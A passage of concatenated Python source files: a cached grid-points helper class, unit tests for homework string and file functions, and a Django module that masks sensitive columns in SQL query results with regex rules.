        def wrapped(kls, *args, **kwargs):
            key = None
            if len(args) == 2:
                key = args

            cached = None
            if key is not None:
                cached = BoundCache[name].get(key)

            if cached is None:
                cached = list(func(kls, *args, **kwargs))
                if key is not None:
                    BoundCache[name][key] = cached

            return cached

    else:

        @wraps(func)
        def wrapped(kls, *args, **kwargs):
            bounds = None
            if len(args) == 1:
                bounds = args[0]

            cached = None
            if bounds is not None:
                cached = BoundCache[name].get(bounds)

            if cached is None:
                result = func(kls, *args, **kwargs)
                if name != "count_points":
                    result = list(result)
                cached = BoundCache[name][bounds] = result

            return cached

    return wrapped


class Points:
    @classmethod
    @_points_bound_cache
    def cols(kls, bounds):
        (l, r), _, _ = bounds
        for col in range(l, r):
            yield kls.col(col, bounds)

    @classmethod
    @_points_bound_cache
    def rows(kls, bounds):
        _, (t, b), _ = bounds
        for row in range(t, b, -1):
            yield kls.row(row, bounds)

    @classmethod
    @_points_bound_cache
    def all_points(kls, bounds):
        for row in kls.rows(bounds):
            yield from row

    @classmethod
    @_points_bound_cache
    def count_points(kls, bounds):
        return sum(len(row) for row in kls.rows(bounds))

    @classmethod
    @_points_bound_cache
    def row(kls, row, bounds):
        (l, r), _, _ = bounds
        return [(col, row) for col in range(l, r)]

    @classmethod
    @_points_bound_cache
    def col(kls, col, bounds):
        _, (t, b), _ = bounds
        return [(col, row) for row in range(t, b, -1)]

    @classmethod
    def expand(kls, bounds, amount):
        (l, r), (t, b), (w, h) = bounds
        return (l - amount, r + amount), (t + amount, b - amount), (w + amount * 2, h + amount * 2)

    @classmethod
    def relative(kls, point, bounds):
        (l, _), (t, _), _ = bounds
        return point[0] - l, t - point[1]

    @classmethod
    def bottom_row(kls, bounds):
        _, (_, b), _ = bounds
        return b

    @classmethod
    def top_row(kls, bounds):
        _, (t, _), _ = bounds
        return t
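
# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical example of how these helpers compose, assuming
# bounds take the form ((left, right), (top, bottom), (width, height)) as the
# destructuring in expand() implies. Requires the `lru` (lru-dict) package.
if __name__ == "__main__":
    bounds = ((0, 4), (2, -2), (4, 4))

    # Every (col, row) point inside the bounds; cached after the first call
    print(Points.count_points(bounds))       # 16
    print(Points.all_points(bounds)[:4])     # [(0, 2), (1, 2), (2, 2), (3, 2)]

    # Halve brightness relative to WHITE, then average with a saturated green
    dimmed = Color.adjust(Color.WHITE, brightness_change=-0.5)
    print(average_color([dimmed, (120, 1, 1, 0)]))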
StarcoderdataPython
3318894
""" Created on Saturday 22 feb 04:53:34 2020 @author: nkalyan🤠 '''Implementing test cases on Python Scripts on strings and file ''' """ import unittest from HW05_nikhil_kalyan import reverse_string, find_second, get_lines, sub_string class ReverseTest(unittest.TestCase): """ test reverse function """ def test_reverse_string(self): """ verify that reverse string function works properly """ self.assertEqual(reverse_string(""), "") self.assertEqual(reverse_string("789"), "987") self.assertEqual(reverse_string("vedanta"), "atnadev") class SubstringTest(unittest.TestCase): """Test substring function""" def test_sub_string(self): """Verify substring works properly""" string: str = "Hello" var_name: str = "<NAME>" self.assertEqual(sub_string("He", string), string.find('He')) self.assertEqual(sub_string('n', var_name), var_name.find("n")) self.assertNotEqual(sub_string('Groot', var_name), var_name.find("I am")) class FindSecondTest(unittest.TestCase): """ test find_second """ def test_find_second(self): """ verify that find_second works properly """ self.assertTrue(find_second('Tony', 'TonyTonystark') == 4) self.assertTrue(find_second('abba', 'abbabba') == 3) self.assertTrue(find_second(' ', 'avengers') == -1) self.assertEqual ( find_second('ba', 'babablacksheep'), 2) class GetLinesTest(unittest.TestCase): """ test get_lines """ def test_get_lines(self): """ verify that get_lines works properly """ path_name = 'text.txt' file_name = 'C:/Users/NICKY/PycharmProjects/SWW810/SSW810 Homework/text1.txt' expect1 = [] expect: List[str] = ['<line0>', '<line1>', '<line2>', '<line3.1 line3.2 line3.3>', '<line4.1 line4.2>', '<line5>', '<line6>'] result = list(get_lines(file_name)) self.assertEqual(result, expect) self.assertEqual(list(get_lines(path_name)), expect1) self.assertEqual(list(get_lines(file_name)), result) if __name__ == '__main__': unittest.main(exit=False, verbosity=2)
StarcoderdataPython
3306070
# -*- coding:utf-8 -*-
import logging
import sqlparse
from django.forms import model_to_dict
from sqlparse.tokens import Keyword
import pandas as pd
from sql.engines.goinception import GoInceptionEngine
from sql.models import DataMaskingRules, DataMaskingColumns
import re
import traceback

logger = logging.getLogger('default')


def data_masking(instance, db_name, sql, sql_result):
    """Mask sensitive data in a query result set"""
    try:
        keywords_count = {}
        # Parse the query; UNION statements need special handling
        p = sqlparse.parse(sql)[0]
        for token in p.tokens:
            if token.ttype is Keyword and token.value.upper() in ['UNION', 'UNION ALL']:
                keywords_count['UNION'] = keywords_count.get('UNION', 0) + 1
        # Get the select list via goInception
        inception_engine = GoInceptionEngine()
        select_list = inception_engine.query_data_masking(instance=instance, db_name=db_name, sql=sql)
        # If UNION is present, de-duplicate the select list
        select_list = del_repeat(select_list, keywords_count) if keywords_count else select_list
        # Analyze the parse tree and collect the columns that hit a masking rule
        hit_columns = analyze_query_tree(select_list, instance)
        sql_result.mask_rule_hit = True if hit_columns else False
        # Mask the data of the columns in hit_columns
        masking_rules = {i.rule_type: model_to_dict(i) for i in DataMaskingRules.objects.all()}
        if hit_columns and sql_result.rows:
            rows = list(sql_result.rows)
            for column in hit_columns:
                index, rule_type = column['index'], column['rule_type']
                masking_rule = masking_rules.get(rule_type)
                if not masking_rule:
                    continue
                for idx, item in enumerate(rows):
                    rows[idx] = list(item)
                    rows[idx][index] = regex(masking_rule, rows[idx][index])
            sql_result.rows = rows
            # Mark the result as masked
            sql_result.is_masked = True
    except Exception as msg:
        logger.warning(f'Data masking error, details: {traceback.format_exc()}')
        sql_result.error = str(msg)
        sql_result.status = 1
    return sql_result


def del_repeat(select_list, keywords_count):
    """The input data is the list result of inception_engine.query_data_masking.

    Before de-duplication:
        [{'index': 0, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'},
         {'index': 1, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'}]
    After de-duplication:
        [{'index': 0, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'}]
    Returns a list with the same structure.
    keywords_count holds the number of occurrences of each keyword.
    """
    # Convert the query tree into a DataFrame first to make counting easier
    df = pd.DataFrame(select_list)
    # De-duplicate by field only, instead of by schema/table/field as before
    # result_index = df.groupby(['field', 'table', 'schema']).filter(lambda g: len(g) > 1).to_dict('records')
    result_index = df.groupby(['field']).filter(lambda g: len(g) > 1).to_dict('records')
    # Count the duplicates
    result_len = len(result_index)
    # Keep the first N list entries, where N = duplicates / (UNION count + 1)
    group_count = int(result_len / (keywords_count['UNION'] + 1))
    result = result_index[:group_count]
    return result


def analyze_query_tree(select_list, instance):
    """Parse the select list and return the columns that hit a masking rule"""
    # Fetch all active masking columns of the instance up front to avoid
    # repeated queries in the loop below
    masking_columns = {
        f"{i.instance}-{i.table_schema}-{i.table_name}-{i.column_name}": model_to_dict(i)
        for i in DataMaskingColumns.objects.filter(instance=instance, active=True)
    }
    # Walk the select list and format the information of the matched columns
    hit_columns = []
    for column in select_list:
        table_schema, table, field = column.get('schema'), column.get('table'), column.get('field')
        masking_column = masking_columns.get(f"{instance}-{table_schema}-{table}-{field}")
        if masking_column:
            hit_columns.append({
                "instance_name": instance.instance_name,
                "table_schema": table_schema,
                "table_name": table,
                "column_name": field,
                "rule_type": masking_column['rule_type'],
                "is_hit": True,
                "index": column['index']
            })
    return hit_columns


def regex(masking_rule, value):
    """Mask data using a regular expression"""
    rule_regex = masking_rule['rule_regex']
    hide_group = masking_rule['hide_group']
    # The regex must define capture groups; the hidden group is replaced with ****
    try:
        p = re.compile(rule_regex, re.I)
        m = p.search(str(value))
        masking_str = ''
        for i in range(m.lastindex):
            if i == hide_group - 1:
                group = '****'
            else:
                group = m.group(i + 1)
            masking_str = masking_str + group
        return masking_str
    except AttributeError:
        # No match (m is None): return the value unmasked
        return value


def brute_mask(instance, sql_result):
    """The input is a resultset:
        sql_result.full_sql
        sql_result.rows   query result rows, a list whose items are tuples
    Returns a sql_result with the same structure; masking errors are written to error.
    """
    # Load the masking rules of all related instances, de-duplicated, and apply
    # them to the whole result set without matching specific configured columns
    rule_types = DataMaskingColumns.objects.filter(instance=instance).values_list('rule_type', flat=True).distinct()
    masking_rules = DataMaskingRules.objects.filter(rule_type__in=rule_types)
    for reg in masking_rules:
        compiled_r = re.compile(reg.rule_regex, re.I)
        replace_pattern = r""
        rows = list(sql_result.rows)
        for i in range(1, compiled_r.groups + 1):
            if i == int(reg.hide_group):
                replace_pattern += r"****"
            else:
                replace_pattern += r"\{}".format(i)
        for i in range(len(sql_result.rows)):
            temp_value_list = []
            for j in range(len(sql_result.rows[i])):
                # Apply the regex substitution
                temp_value_list += [compiled_r.sub(replace_pattern, str(sql_result.rows[i][j]))]
            rows[i] = tuple(temp_value_list)
        sql_result.rows = rows
    return sql_result


def simple_column_mask(instance, sql_result):
    """The input is a resultset:
        sql_result.full_sql
        sql_result.rows         query result rows, a list whose items are tuples
        sql_result.column_list  query result column names, a list
    Returns a sql_result with the same structure; masking errors are written to error.
    """
    # Fetch the masking columns of the current instance up front to avoid
    # repeated queries in the loop below
    masking_columns = DataMaskingColumns.objects.filter(instance=instance, active=True)
    # Lower-case the output column names of the SQL (for Oracle masking compatibility)
    sql_result_column_list = [c.lower() for c in sql_result.column_list]
    if masking_columns:
        try:
            for mc in masking_columns:
                # Column name of the masking rule
                column_name = mc.column_name.lower()
                # Indexes of the result columns matched by the masking rule
                _masking_column_index = []
                if column_name in sql_result_column_list:
                    _masking_column_index.append(sql_result_column_list.index(column_name))
                # Handle aliased columns
                try:
                    for _c in sql_result_column_list:
                        alias_column_regex = r'"?([^\s"]+)"?\s+(as\s+)?"?({})[",\s+]?'.format(re.escape(_c))
                        alias_column_r = re.compile(alias_column_regex, re.I)
                        # Parse aliased columns out of the original SQL
                        search_data = re.search(alias_column_r, sql_result.full_sql)
                        # Column name
                        _column_name = search_data.group(1).lower()
                        s_column_name = re.sub(r'^"?\w+"?\."?|\.|"$', '', _column_name)
                        # Alias
                        alias_name = search_data.group(3).lower()
                        # If the column name matches a configured masking column, mask it
                        if s_column_name == column_name:
                            _masking_column_index.append(sql_result_column_list.index(alias_name))
                except Exception:
                    pass

                for masking_column_index in _masking_column_index:
                    # Masking rule
                    masking_rule = DataMaskingRules.objects.get(rule_type=mc.rule_type)
                    # Build the replacement pattern for the masked value
                    compiled_r = re.compile(masking_rule.rule_regex, re.I | re.S)
                    replace_pattern = r""
                    for i in range(1, compiled_r.groups + 1):
                        if i == int(masking_rule.hide_group):
                            replace_pattern += r"****"
                        else:
                            replace_pattern += r"\{}".format(i)

                    rows = list(sql_result.rows)
                    for i in range(len(sql_result.rows)):
                        temp_value_list = []
                        for j in range(len(sql_result.rows[i])):
                            column_data = sql_result.rows[i][j]
                            if j == masking_column_index:
                                column_data = compiled_r.sub(replace_pattern, str(sql_result.rows[i][j]))
                            temp_value_list += [column_data]
                        rows[i] = tuple(temp_value_list)
                    sql_result.rows = rows
        except Exception as e:
            sql_result.error = str(e)
    return sql_result
StarcoderdataPython